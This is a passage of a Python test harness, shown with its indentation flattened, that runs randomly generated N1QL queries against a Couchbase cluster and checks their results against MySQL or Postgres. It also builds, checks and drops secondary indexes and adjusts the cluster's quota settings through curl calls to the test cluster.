n1ql_query = n1ql_query.replace("t_5.t_5.simple_table_2", "t_5.simple_table_2")
if "qty" in n1ql_query:
n1ql_query = n1ql_query.replace("t_2.qty", "qty")
n1ql_query = n1ql_query.replace("qty", "t_2.qty")
if "sum" in n1ql_query:
n1ql_query = n1ql_query.replace("sum(t_1.productId)", "sum(t_1.qty)")
sql_query = sql_query.replace("sum(t_1.productId)", "sum(t_1.qty)")
n1ql_query = n1ql_query.replace("t_5.simple_table_2 t_1.price", "t_1.price")
sql_query = sql_query.replace("simple_table_2 t_1.price", "t_1.price")
n1ql_query = n1ql_query + " order by primary_key_id limit 5"
sql_query = sql_query + " order by t_5.primary_key_id limit 5"
if "sum" in n1ql_query or "min" in n1ql_query or "max" in n1ql_query or "count" in n1ql_query:
aggregate = True
return sql_query, n1ql_query, aggregate
def handle_hash_join(self, n1ql_query):
if self.ansi_joins and self.hash_joins:
hash_join_template_list = ["HASH(build)", "HASH(probe)"]
n1ql_query.replace(" ON ", "{0} ON ".random.choice(hash_join_template_list))
return n1ql_query
def _run_query_with_pushdown_check(self, n1ql_query, index):
message = "Pass"
explain_check = False
if isinstance(index, dict):
index = [index]
query = self.query_helper._add_index_hints_to_query(n1ql_query, index)
explain_n1ql = "EXPLAIN " + query
try:
actual_result = self.n1ql_helper.run_cbq_query(query=explain_n1ql, server=self.n1ql_server)
if "index_group_aggs" in str(actual_result):
explain_check = True
if not explain_check:
message = "aggregate query {0} with index {1} failed explain result, index_group_aggs not found".format(n1ql_query, index)
self.log.info(message)
self.log.info(str(actual_result))
except Exception as ex:
self.log.info(ex)
message = ex
explain_check = False
finally:
return {"success": explain_check, "result": message}
def _verify_query_with_hash_joins(self, n1ql_query):
message = "Pass"
explain_check = True
explain_n1ql = "EXPLAIN " + n1ql_query
hash_query_count = n1ql_query.count("HASH")
try:
actual_result = self.n1ql_helper.run_cbq_query(query=explain_n1ql, server=self.n1ql_server)
hash_explain_count = str(actual_result).count("HashJoin")
explain_check = (hash_query_count == hash_explain_count)
if not explain_check:
message = "Join query {0} with failed explain result, HashJoins not found".format(n1ql_query)
self.log.info(message)
self.log.info(str(actual_result))
except Exception as ex:
self.log.info(ex)
message = ex
explain_check = False
finally:
return {"success": explain_check, "result": message}
def _run_basic_crud_test(self, test_data, verification_query, test_case_number, result_queue, failure_record_queue=None, table_name=None):
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< BEGIN RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(test_case_number))
result_run = {}
n1ql_query = test_data["n1ql_query"]
if n1ql_query.find("copy_simple_table") > 0:
n1ql_query = n1ql_query.replace("simple_table", self.database+"_"+"simple_table")
n1ql_query = n1ql_query.replace("copy_"+self.database+"_"+"simple_table", "copy_simple_table")
n1ql_query = n1ql_query.replace("ON KEY copy_simple_table", "ON KEY " + self.database+"_"+"copy_simple_table")
else:
n1ql_query = n1ql_query.replace("simple_table", self.database+"_"+"simple_table")
test_data["n1ql_query"] = n1ql_query
sql_query = test_data["sql_query"]
result_run["n1ql_query"] = n1ql_query
result_run["sql_query"] = sql_query
result_run["test_case_number"] = test_case_number
self.log.info("SQL :: {0}".format(sql_query))
self.log.info("N1QL :: {0}".format(n1ql_query))
crud_ops_run_result = None
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
try:
self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server)
client._insert_execute_query(query=sql_query)
except Exception as ex:
self.log.info(ex)
crud_ops_run_result = {"success": False, "result": str(ex)}
client._close_connection()
client._close_connection()
if crud_ops_run_result is None:
query_index_run = self._run_queries_and_verify_crud(n1ql_query=verification_query, sql_query=verification_query, expected_result=None, table_name=table_name)
else:
query_index_run = crud_ops_run_result
result_run["crud_verification_test"] = query_index_run
result_queue.put(result_run)
self._check_and_push_failure_record_queue(result_run, test_data, failure_record_queue)
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< END RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(test_case_number))
def _test_result_analysis(self, queue):
result_list = []
pass_case = 0
fail_case = 0
failure_map = {}
keyword_map = {}
failure_reason_map = {}
success = True
while not queue.empty():
result_list.append(queue.get())
total = len(result_list)
for result_run in result_list:
test_case_number = result_run["test_case_number"]
sql_query = result_run["sql_query"]
n1ql_query = result_run["n1ql_query"]
check, message, failure_types = self._analyze_result(result_run)
success = success and check
if check:
pass_case += 1
else:
fail_case += 1
for failure_reason_type in failure_types:
if failure_reason_type not in list(failure_reason_map.keys()):
failure_reason_map[failure_reason_type] = 1
else:
failure_reason_map[failure_reason_type] += 1
keyword_list = self.query_helper.find_matching_keywords(n1ql_query, self.keyword_list)
for keyword in keyword_list:
if keyword not in list(keyword_map.keys()):
keyword_map[keyword] = 1
else:
keyword_map[keyword] += 1
failure_map[test_case_number] = {"sql_query": sql_query, "n1ql_query": n1ql_query,
"run_result": message, "keyword_list": keyword_list}
pass_percent = 0
if total > 0:
summary = " Total Queries Run = {0}, Pass = {1}, Fail = {2}, Pass Percentage = {3} %".format(total, pass_case, fail_case, ((pass_case*100)/total))
else:
summary = " No Query Results Found"
if len(keyword_map) > 0:
summary += "\n [ KEYWORD FAILURE DISTRIBUTION ] \n"
for keyword in list(keyword_map.keys()):
summary += keyword+" :: " + str((keyword_map[keyword]*100)/total)+"%\n "
if len(failure_reason_map) > 0:
summary += "\n [ FAILURE TYPE DISTRIBUTION ] \n"
for keyword in list(failure_reason_map.keys()):
summary += keyword+" :: " + str((failure_reason_map[keyword]*100)/total)+"%\n "
self.log.info(" Total Queries Run = {0}, Pass = {1}, Fail = {2}, Pass Percentage = {3} %".format(total, pass_case, fail_case, ((pass_case*100)/total)))
result = self._generate_result(failure_map)
return success, summary, result
def _gen_expected_result(self, sql="", test=49):
sql_result = []
try:
client = None
if self.use_mysql:
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
elif self.use_postgres:
client = RQGPostgresClient()
if test == 51:
columns = []
rows = []
else:
columns, rows = client._execute_query(query=sql)
if self.aggregate_pushdown:
sql_result = client._gen_json_from_results_repeated_columns(columns, rows)
else:
sql_result = client._gen_json_from_results(columns, rows)
client._close_connection()
except Exception as ex:
self.log.info(ex)
traceback.print_exc()
if ex.message.__contains__("SQL syntax") or ex.message.__contains__("ERROR"):
print("Error in sql syntax")
return sql_result
def _check_explain_plan_for_secondary_index(self, n1ql_query=None):
self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server)
actual_result = self.n1ql_helper.run_cbq_query(query="EXPLAIN "+n1ql_query, server=self.n1ql_server)
self.log.info("EXPLAIN PLAN :: "+str(actual_result))
if "PrimaryScan" in str(actual_result['results'][0]['plan']):
return {"success": False, "result": "Fail"}
else:
return {"success": True, "result": "Pass"}
def _run_queries_and_verify(self, aggregate=False, subquery=False, n1ql_query=None, sql_query=None, expected_result=None):
query_context = ""
skip = False
use_prepared = False
fts_explain_query = ""
chance_of_prepared = random.randint(1, 100)
if chance_of_prepared <= 20:
use_prepared = True
self.log.info("Preparing query {0}".format(n1ql_query))
if not self.create_primary_index:
n1ql_query = n1ql_query.replace("USE INDEX(`#primary` USING GSI)", " ")
if self.prepared or use_prepared:
n1ql_query = "PREPARE " + n1ql_query
self.log.info("Prepared query {0}".format(n1ql_query))
if self.use_default_collection:
n1ql_query = n1ql_query.replace("table_10", "table_010")
for bucket in self.advise_dict.keys():
n1ql_query = n1ql_query.replace(bucket, bucket+"._default._default")
n1ql_query = n1ql_query.replace("table_010", "table_10._default._default")
if self.use_query_context:
n1ql_query = n1ql_query.replace("table_10", "table_010")
# So that query context works for multiple buckets, replace the first matching bucket and leave the rest as full paths
for bucket in self.advise_dict.keys():
if bucket in n1ql_query and not skip:
n1ql_query = n1ql_query.replace(bucket, "_default")
query_context = "default:"+bucket+"._default"
skip = True
else:
n1ql_query = n1ql_query.replace(bucket, bucket + "._default._default")
n1ql_query = n1ql_query.replace("table_010", "table_10._default._default")
fts_query = n1ql_query
cbas_query = n1ql_query
if self.use_fts:
if not "JOIN" in n1ql_query:
add_hint = n1ql_query.split("WHERE")
fts_query = add_hint[0] + " USE INDEX (USING FTS, USING GSI) WHERE " + add_hint[1]
if "BETWEEN" in n1ql_query:
fts_query = add_hint[0] + " USE INDEX (USING FTS) WHERE " + add_hint[1]
else:
split_list = n1ql_query.split("JOIN")
i = 0
new_n1ql = ""
for items in split_list:
if "ON" in items:
items = items.replace("ON", "USE INDEX (USING FTS) ON")
else:
items = items.replace("INNER", "USE INDEX (USING FTS) INNER")
items = items.replace("LEFT", "USE INDEX (USING FTS) LEFT")
if i == 0:
new_n1ql = new_n1ql + items
else:
new_n1ql = new_n1ql + " JOIN " + items
i = i + 1
fts_query = new_n1ql
fts_explain_query = fts_query
self.log.info(" FTS QUERY :: {0}".format(fts_query))
elif self.use_analytics:
cbas_query = cbas_query.replace("ANY ", "(ANY ")
cbas_query = cbas_query.replace("EVERY ", "(EVERY ")
cbas_query = cbas_query.replace("SOME ", "(SOME ")
cbas_query = cbas_query.replace("END", "END)")
cbas_query = cbas_query.replace("type", "`type`")
else:
self.log.info(" SQL QUERY :: {0}".format(sql_query))
self.log.info(" N1QL QUERY :: {0}".format(n1ql_query))
# Run n1ql query
hints = self.query_helper._find_hints(sql_query)
for i, item in enumerate(hints):
if "simple_table" in item:
hints[i] = hints[i].replace("simple_table", self.database+"_"+"simple_table")
try:
if subquery:
query_params = {'timeout': '1200s'}
else:
query_params={}
if self.use_fts:
fts_result = self.n1ql_query_runner_wrapper(n1ql_query=fts_query, server=self.n1ql_server,
query_params=query_params,query_context=query_context)
if self.use_query_context:
if "PREPARE" in fts_query:
fts_explain_query = fts_query.replace("PREPARE","")
fts_explain = self.n1ql_helper.run_cbq_query(query="EXPLAIN " + fts_explain_query, server=self.n1ql_server,
query_params=query_params,query_context=query_context,use_sdk=self.use_sdk)
else:
if "PREPARE" in fts_query:
fts_explain_query = fts_query.replace("PREPARE","")
fts_explain = self.n1ql_helper.run_cbq_query(query="EXPLAIN " + fts_explain_query, server=self.n1ql_server,query_params=query_params,use_sdk=self.use_sdk)
if not (fts_explain['results'][0]['plan']['~children'][0]['#operator'] == 'IndexFtsSearch' or fts_explain['results'][0]['plan']['~children'][0]['~children'][0]['#operator'] == 'IndexFtsSearch'):
return {"success": False, "result": str("Query does not use fts index {0}".format(fts_explain))}
elif self.use_analytics:
analytics_result = self.n1ql_query_runner_wrapper(n1ql_query=cbas_query, server=self.n1ql_server,
query_params=query_params,query_context=query_context)
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server, query_params=query_params, scan_consistency="request_plus",query_context=query_context)
if self.prepared or use_prepared:
name = actual_result["results"][0]['name']
prepared_query = "EXECUTE '%s'" % name
self.log.info(" N1QL QUERY :: {0}".format(prepared_query))
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=prepared_query, server=self.n1ql_server, query_params=query_params, scan_consistency="request_plus",query_context=query_context)
if self.use_fts:
fts_result = self.n1ql_query_runner_wrapper(n1ql_query=prepared_query, server=self.n1ql_server, query_params=query_params, scan_consistency="request_plus",query_context=query_context)
n1ql_result = actual_result["results"]
if self.use_fts:
fts_result = fts_result["results"]
elif self.use_analytics:
analytics_result = analytics_result['results']
# Run SQL Query
if not self.use_fts and not self.use_analytics:
sql_result = expected_result
client = None
if self.use_mysql:
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
elif self.use_postgres:
client = RQGPostgresClient()
if expected_result is None:
columns, rows = client._execute_query(query=sql_query)
if self.aggregate_pushdown:
sql_result = client._gen_json_from_results_repeated_columns(columns, rows)
else:
sql_result = client._gen_json_from_results(columns, rows)
client._close_connection()
self.log.info(" result from sql query returns {0} items".format(len(sql_result)))
elif self.use_fts:
self.log.info(" result from fts query returns {0} items".format(len(fts_result)))
elif self.use_analytics:
self.log.info(" result from analytics query returns {0} items".format(len(analytics_result)))
self.log.info(" result from n1ql query returns {0} items".format(len(n1ql_result)))
if self.use_fts:
if len(n1ql_result) != len(fts_result):
self.log.info("number of results returned from sql and n1ql are different")
self.log.info("fts query is {0}".format(fts_query))
self.log.info("n1ql query is {0}".format(n1ql_query))
if (len(fts_result) == 0 and len(n1ql_result) == 1) or (
len(n1ql_result) == 0 and len(fts_result) == 1) or (len(fts_result) == 0):
return {"success": True, "result": "Pass"}
return {"success": False, "result": str("different results")}
elif self.use_analytics:
if len(n1ql_result) != len(analytics_result):
self.log.info("number of results returned from analytics and n1ql are different")
self.log.info("analytics query is {0}".format(cbas_query))
self.log.info("n1ql query is {0}".format(n1ql_query))
if (len(analytics_result) == 0 and len(n1ql_result) == 1) or (
len(n1ql_result) == 0 and len(analytics_result) == 1) or (len(analytics_result) == 0):
return {"success": True, "result": "Pass"}
return {"success": False, "result": str("different results")}
else:
if len(n1ql_result) != len(sql_result):
self.log.info("number of results returned from sql and n1ql are different")
self.log.info("sql query is {0}".format(sql_query))
self.log.info("n1ql query is {0}".format(n1ql_query))
if (len(sql_result) == 0 and len(n1ql_result) == 1) or (len(n1ql_result) == 0 and len(sql_result) == 1) or (len(sql_result) == 0):
return {"success": True, "result": "Pass"}
return {"success": False, "result": str("different results")}
try:
if self.use_fts:
self.n1ql_helper._verify_results_rqg(subquery, aggregate, sql_result=fts_result, n1ql_result=n1ql_result, hints=hints, aggregate_pushdown=self.aggregate_pushdown,use_fts=self.use_fts)
elif self.use_analytics:
self.n1ql_helper._verify_results_rqg(subquery, aggregate, sql_result=analytics_result, n1ql_result=n1ql_result, hints=hints, aggregate_pushdown=self.aggregate_pushdown)
else:
self.n1ql_helper._verify_results_rqg(subquery, aggregate, sql_result=sql_result, n1ql_result=n1ql_result, hints=hints, aggregate_pushdown=self.aggregate_pushdown)
except Exception as ex:
self.log.info(ex)
traceback.print_exc()
return {"success": False, "result": str(ex) }
return {"success": True, "result": "Pass"}
except Exception as ex:
self.log.info(ex)
traceback.print_exc()
return {"success": False, "result": str(ex)}
def _run_queries_and_verify_crud(self, n1ql_query=None, sql_query=None, expected_result=None, table_name=None):
self.log.info(" SQL QUERY :: {0}".format(sql_query))
self.log.info(" N1QL QUERY :: {0}".format(n1ql_query))
if n1ql_query.find(self.database) <= 0:
n1ql_query = n1ql_query.replace("simple_table", self.database+"_"+"simple_table")
hints = self.query_helper._find_hints(sql_query)
for i, item in enumerate(hints):
if "simple_table" in item:
hints[i] = hints[i].replace("simple_table", self.database+"_"+"simple_table")
try:
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server, scan_consistency="request_plus")
n1ql_result = actual_result["results"]
# Run SQL Query
sql_result = expected_result
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
if expected_result is None:
columns, rows = client._execute_query(query=sql_query)
sql_result = client._gen_json_from_results(columns, rows)
client._close_connection()
self.log.info(" result from n1ql query returns {0} items".format(len(n1ql_result)))
self.log.info(" result from sql query returns {0} items".format(len(sql_result)))
if len(n1ql_result) != len(sql_result):
self.log.info("number of results returned from sql and n1ql are different")
self.log.info("sql query is {0}".format(sql_query))
self.log.info("n1ql query is {0}".format(n1ql_query))
if (len(sql_result) == 0 and len(n1ql_result) == 1) or (len(n1ql_result) == 0 and len(sql_result) == 1) or (len(sql_result) == 0):
return {"success": True, "result": "Pass"}
try:
self.n1ql_helper._verify_results_crud_rqg(sql_result=sql_result, n1ql_result=n1ql_result, hints=hints)
except Exception as ex:
self.log.info(ex)
return {"success": False, "result": str(ex)}
return {"success": True, "result": "Pass"}
except Exception as ex:
return {"success": False, "result": str(ex)}
def _run_queries_with_explain(self, n1ql_query=None, indexes={}):
run_result = {}
# Run n1ql query
for index_name in indexes:
hint = "USE INDEX({0} USING {1})".format(index_name, indexes[index_name]["type"])
n1ql = self.query_helper._add_explain_with_hints(n1ql_query, hint)
self.log.info(n1ql)
message = "Pass"
check = True
fieldsnotcovered = False
if self.check_covering_index:
query = "select * from system:indexes where name = '%s'" % index_name
actual_result = self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server)
n1ql_result = actual_result["results"]
fields = n1ql_result[0]["indexes"]["index_key"]
fieldsnotcovered = self.query_helper.check_groupby_orderby(n1ql_query, fields)
if "NOT" in n1ql or "not" in n1ql or fieldsnotcovered and self.check_covering_index:
key = "Explain for index {0}".format(index_name)
run_result[key] = {"success": check, "result": message}
else:
try:
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql, server=self.n1ql_server)
self.log.info(actual_result)
check = self.n1ql_helper.verify_index_with_explain(actual_result, index_name,
self.check_covering_index)
if not check:
message = " query {0} failed explain result, index {1} not found".format(n1ql_query, index_name)
self.log.info(message)
except Exception as ex:
self.log.info(ex)
message = ex
check = False
finally:
key = "Explain for index {0}".format(index_name)
run_result[key] = {"success": check, "result": message}
return run_result
def _run_explain_queries(self, n1ql_query=None, keyword ="", present=True):
run_result = {}
# Run n1ql query
n1ql = self.query_helper._add_explain_with_hints(n1ql_query)
self.log.info("Running query: " + n1ql)
message = "Pass"
try:
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql, server=self.n1ql_server)
self.log.info(actual_result)
check = self.n1ql_helper.verify_explain(actual_result, keyword, present)
if not check:
if present:
message = " query {0} failed explain result, keyword {1} not found".format(n1ql_query, keyword)
else:
message = " query {0} failed explain result, keyword {1} was found but should not be present".format(n1ql_query, keyword)
self.log.info(message)
except Exception as ex:
self.log.info(ex)
message = ex
check = False
finally:
key = "Explain for query: {0}".format(n1ql)
run_result[key] = {"success": check, "result": message}
return run_result
def _initialize_cluster_setup(self):
if self.use_mysql:
self.log.info(" Will load directly from mysql")
self._initialize_mysql_client()
if not self.generate_input_only:
self._setup_and_load_buckets()
elif self.use_postgres:
self._initialize_postgres_client()
if not self.generate_input_only:
self._setup_and_load_buckets()
else:
self.log.info(" Will load directly from file snap-shot")
if self.populate_with_replay:
self._initialize_mysql_client()
self._setup_and_load_buckets_from_files()
self.n1ql_helper = self._initialize_n1ql_helper()
# create copy of simple table if this is a merge operation
self.sleep(10)
if self.gsi_type == "memory_optimized":
os.system("curl -X POST http://Administrator:password@{1}:8091/pools/default -d memoryQuota={0} -d indexMemoryQuota={2}".format(self.ram_quota, self.n1ql_server.ip, self.indexer_memQuota))
self.sleep(10)
if self.change_bucket_properties:
shell = RemoteMachineShellConnection(self.master)
shell.execute_command("curl -X POST -u {0}:{1} -d maxBucketCount=25 http://{2}:{3}/internalSettings".format(self.user_cluster, self.password_cluster, self.master.ip, self.master.port))
self.sleep(10, "Updating maxBucket count to 15")
self._build_indexes()
def _build_indexes(self):
self.sec_index_map = {}
fields = ['primary_key_id', 'bool_field1', 'char_field1', 'datetime_field1', 'decimal_field1',
'int_field1', 'varchar_field1']
if self.create_secondary_indexes:
if self.use_mysql or self.use_postgres:
self.sec_index_map = self.client._gen_index_combinations_for_tables(partitioned_indexes=self.partitioned_indexes)
else:
self.sec_index_map = self._extract_secondary_index_map_from_file(self.secondary_index_info_path)
if not self.generate_input_only:
if self.create_primary_index:
self._build_primary_indexes(self.using_gsi)
if self.create_secondary_meta_indexes:
index_name = ""
for table_name in list(self.sec_index_map.keys()):
queries = {}
index_name = table_name
query = "CREATE INDEX {0} ON {1}(primary_key_id,bool_field1,char_field1," \
"datetime_field1," \
"decimal_field1,int_field1,varchar_field1)".format(table_name, self.database + "_" + table_name)
queries[index_name] = query
if self.create_secondary_ansi_join_indexes:
for field in fields:
index_name = table_name+"_"+field
query = "CREATE INDEX {0} ON {1}({2})".format(table_name+"_"+field, self.database+"_"+table_name, field)
queries[index_name] = query
for index_name in list(queries.keys()):
try:
self.n1ql_helper.run_cbq_query(query=queries[index_name],
server=self.n1ql_server, verbose=False)
check = self.n1ql_helper.is_index_online_and_in_list(self.database+"_"+table_name,
index_name ,
server=self.n1ql_server,
timeout=240)
except Exception as ex:
self.log.info(ex)
if self.create_secondary_indexes and (not self.create_secondary_meta_indexes):
thread_list = []
if self.build_secondary_index_in_seq:
for table_name in list(self.sec_index_map.keys()):
self._gen_secondary_indexes_per_table(self.database+"_"+table_name, self.sec_index_map[table_name], 0)
else:
for table_name in list(self.sec_index_map.keys()):
t = threading.Thread(target=self._gen_secondary_indexes_per_table, args=(self.database+"_"+table_name, self.sec_index_map[table_name]))
t.daemon = True
t.start()
thread_list.append(t)
for t in thread_list:
t.join()
def _build_primary_indexes(self, using_gsi=True):
if self.create_primary_index:
if not self.partitioned_indexes:
self.n1ql_helper.create_primary_index(using_gsi=using_gsi, server=self.n1ql_server)
else:
self.n1ql_helper.create_partitioned_primary_index(using_gsi=using_gsi, server=self.n1ql_server)
def _load_bulk_data_in_buckets_using_n1ql(self, bucket, data_set):
try:
n1ql_query = self.query_helper._builk_insert_statement_n1ql(bucket.name, data_set)
if not self.use_rest:
new_query_helper = N1QLHelper(version="sherlock", shell=self.shell, max_verify=self.max_verify,
buckets=self.buckets, item_flag=None, n1ql_port=getattr(self.n1ql_server, 'n1ql_port', 8093),
full_docs_list=[], log=self.log, input=self.input, master=self.master,
database=self.database, use_rest=True)
new_query_helper.run_cbq_query(query=n1ql_query, server=self.n1ql_server, verbose=False)
else:
self.n1ql_helper.run_cbq_query(query=n1ql_query, server=self.n1ql_server, verbose=False)
except Exception as ex:
self.log.info('WARN=======================')
self.log.info(ex)
def _load_data_in_buckets_using_mc_bin_client_json(self, bucket, data_set):
client = VBucketAwareMemcached(RestConnection(self.master), bucket)
try:
for key in list(data_set.keys()):
client.set(key.encode("utf8"), 0, 0, json.dumps(data_set[key]))
except Exception as ex:
self.log.info('WARN=======================')
self.log.info(ex)
def _initialize_rqg_query_helper(self):
return RQGQueryHelper()
def _initialize_n1ql_helper(self):
use_engine = random.randint(1, 100)
if use_engine <= 20 and not self.use_analytics:
self.use_sdk = True
elif use_engine <= 40 and not self.use_analytics:
self.use_rest = False
self.log.info("We are using the CBQ engine to run queries for this run")
return N1QLHelper(version="sherlock", shell=self.shell, max_verify=self.max_verify,
buckets=self.buckets, item_flag=None, n1ql_port=getattr(self.n1ql_server, 'n1ql_port', 8903),
full_docs_list=[], log=self.log, input=self.input, master=self.master,
database=self.database, use_rest=self.use_rest)
def _initialize_mysql_client(self):
if self.reset_database:
self.client = RQGMySQLClient(host=self.mysql_url, user_id=self.user_id, password=self.password)
if self.subquery:
path = "b/resources/rqg/{0}/database_definition/definition-subquery.sql".format(self.database)
else:
path = "b/resources/rqg/{0}/database_definition/definition.sql".format(self.database)
self.database = self.database+"_"+str(self.query_helper._random_int())
populate_data = False
if not self.populate_with_replay:
populate_data = True
if self.subquery:
self.client.reset_database_add_data(database=self.database, items=self.items, sql_file_definiton_path=path, populate_data=populate_data, number_of_tables=1)
else:
self.client.reset_database_add_data(database=self.database, items=self.items, sql_file_definiton_path=path, populate_data=populate_data, number_of_tables=self.number_of_buckets)
self._copy_table_for_merge()
else:
self.client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
def _initialize_postgres_client(self):
self.client = RQGPostgresClient()
self.client.reset_database_add_data()
def _copy_table_for_merge(self):
table_list = self.client._get_table_list()
reference_table = table_list[0]
if self.merge_operation:
path = "b/resources/rqg/crud_db/database_definition/table_definition.sql"
self.client.database_add_data(database=self.database, sql_file_definiton_path=path)
table_list = self.client._get_table_list()
for table_name in table_list:
if table_name != reference_table:
sql = "INSERT INTO {0} SELECT * FROM {1}".format(table_name, reference_table)
self.client._insert_execute_query(sql)
table_list = self.client._get_table_list()
for table_name in table_list:
self.client_map[table_name] = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
def _generate_result(self, data):
result = ""
for key in list(data.keys()):
result +="<<<<<<<<<< TEST {0} >>>>>>>>>>> \n".format(key)
for result_key in list(data[key].keys()):
result += "{0} :: {1} \n".format(result_key, data[key][result_key])
return result
def _gen_secondary_indexes_per_table(self, table_name="", index_map={}, sleep_time=2):
if self.partitioned_indexes:
defer_mode = str({"defer_build": "true", "num_partition":2})
else:
defer_mode = str({"defer_build": "true"})
build_index_list = []
batch_index_definitions = index_map
if self.pushdown:
table_field_map = self.client._get_field_list_map_for_tables()
fields = table_field_map['simple_table']
combination_fields = sum([list(map(list, combinations(fields, i))) for i in range(len(fields) + 1)], [])
for x in range(1, len(combination_fields)):
input = combination_fields[x]
if len(input) == 1:
fields_indexed = str(input[0])
index_name = "ix_" + str(0) + str(x)
else:
fields_indexed = str(input[0])
#TODO: this code is really weird!
for i in range(1, len(input)):
index_name = "ix_" + str(i) + str(x)
fields_indexed = fields_indexed+"," + str(x[i])
if self.partitioned_indexes:
query = "CREATE INDEX {0} ON {1}({2}) PARTITION BY HASH(meta().id)".format(
index_name, table_name, fields_indexed)
else:
query = "CREATE INDEX {0} ON {1}({2})".format(index_name,
table_name,
fields_indexed)
build_index_list.append(index_name)
self.log.info(" Running Query {0} ".format(query))
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server, verbose=False)
build_index_list.append(index_name)
self.n1ql_helper.is_index_online_and_in_list(table_name, index_name, server=self.n1ql_server, timeout=240)
except Exception as ex:
self.log.info(ex)
if self.dynamic_indexing:
index_name = "idx_" + table_name
query = "CREATE INDEX {0} ON {1}(DISTINCT ARRAY v FOR v IN PAIRS(SELF) END) WITH {2}".format(index_name, table_name, defer_mode)
build_index_list.append(index_name)
self.log.info(" Running Query {0} ".format(query))
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server, verbose=False)
build_index_list.append(index_name)
except Exception as ex:
self.log.info(ex)
raise
else:
for index_name in list(batch_index_definitions.keys()):
query = "{0} WITH {1}".format(
batch_index_definitions[index_name]["definition"],
defer_mode)
build_index_list.append(index_name)
self.log.info(" Running Query {0} ".format(query))
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server, verbose=False)
build_index_list.append(index_name)
except Exception as ex:
self.log.info(ex)
traceback.print_exc()
raise
# Run Build Query
if build_index_list is not None and len(build_index_list) > 0:
batch_size = 0
end_index_batch = 0
total_indexes = 0
while total_indexes < len(build_index_list):
start_index_batch = end_index_batch
end_index_batch = min(end_index_batch+self.build_index_batch_size, len(build_index_list))
batch_size += 1
if start_index_batch == end_index_batch:
break
list_build_index_list = build_index_list[start_index_batch:end_index_batch]
total_indexes += len(list_build_index_list)
try:
build_query = "BUILD INDEX on {0}({1}) USING GSI".format(table_name, ",".join(list_build_index_list))
actual_result = self.n1ql_helper.run_cbq_query(query=build_query, server=self.n1ql_server)
self.log.info(actual_result)
self.sleep(15, "sleep after building index")
except Exception as ex:
self.log.info(ex)
traceback.print_exc()
raise
self.sleep(sleep_time)
def _extract_secondary_index_map_from_file(self, file_path="/tmp/index.txt"):
with open(file_path) as data_file:
return json.load(data_file)
def _generate_secondary_indexes_in_batches(self, batches):
if self.generate_input_only:
return
defer_mode = str({"defer_build": "true"})
if self.partitioned_indexes:
defer_mode = str({"defer_build": "true", "num_partition":2})
batch_index_definitions = {}
build_index_list = []
# add indexes to batch_index_definitions
for info in batches:
table_name = info["bucket"]
batch_index_definitions.update(info["indexes"])
for index_name in list(batch_index_definitions.keys()):
query = "{0} WITH {1}".format(batch_index_definitions[index_name]["definition"], defer_mode)
query = query.replace("ON simple_table", "ON "+self.database+"_"+"simple_table")
if self.aggregate_pushdown:
query = query.replace("limit 10 offset 4", "")
self.log.info(" Running Query {0} ".format(query))
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server)
if index_name not in build_index_list:
build_index_list.append(index_name)
except Exception as ex:
self.log.info(ex)
traceback.print_exc()
raise
# Run Build Query
if build_index_list is not None and len(build_index_list) > 0:
try:
build_query = "BUILD INDEX on {0}({1}) USING GSI".format(self.database+"_"+table_name, ",".join(build_index_list))
actual_result = self.n1ql_helper.run_cbq_query(query=build_query, server=self.n1ql_server)
self.log.info(actual_result)
except Exception as ex:
self.log.info(ex)
traceback.print_exc()
raise
# Monitor till the index is built
tasks = []
try:
for info in batches:
table_name = info["bucket"]
table_name = self.database+"_"+table_name
for index_name in info["indexes"]:
if index_name in build_index_list:
tasks.append(self.async_monitor_index(bucket=table_name, index_name=index_name))
for task in tasks:
task.result()
except Exception as ex:
traceback.print_exc()
self.log.info(ex)
def async_monitor_index(self, bucket, index_name=None):
monitor_index_task = self.cluster.async_monitor_index(server=self.n1ql_server, bucket=bucket,
n1ql_helper=self.n1ql_helper, index_name=index_name)
return monitor_index_task
def are_any_indexes_present(self, index_name_list):
query_response = self.n1ql_helper.run_cbq_query("SELECT * FROM system:indexes")
current_indexes = [i['indexes']['name'] for i in query_response['results']]
for index_name in index_name_list:
if index_name in current_indexes:
return True
return False
def wait_for_index_drop(self, index_name_list):
self.with_retry(lambda: self.are_any_indexes_present(index_name_list), eval=False, delay=1, tries=30)
def with_retry(self, func, eval=True, delay=5, tries=10):
attempts = 0
while attempts < tries:
attempts = attempts + 1
res = func()
if res == eval:
return res
else:
self.sleep(delay, 'incorrect results, sleeping for %s' % delay)
raise Exception('timeout, invalid results: %s' % res)
def _drop_secondary_indexes_in_batches(self, batches):
dropped_indexes = []
for info in batches:
table_name = info["bucket"]
table_name = self.database+"_"+table_name
for index_name in list(info["indexes"].keys()):
if index_name not in dropped_indexes:
query = "DROP INDEX {0}.{1} USING {2}".format(table_name, index_name,
info["indexes"][index_name]["type"])
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server,
query_params={'timeout': '900s'})
dropped_indexes.append(index_name)
except Exception as ex:
self.log.info("Error: " + str(ex))
self.wait_for_index_drop(list(info["indexes"].keys()))
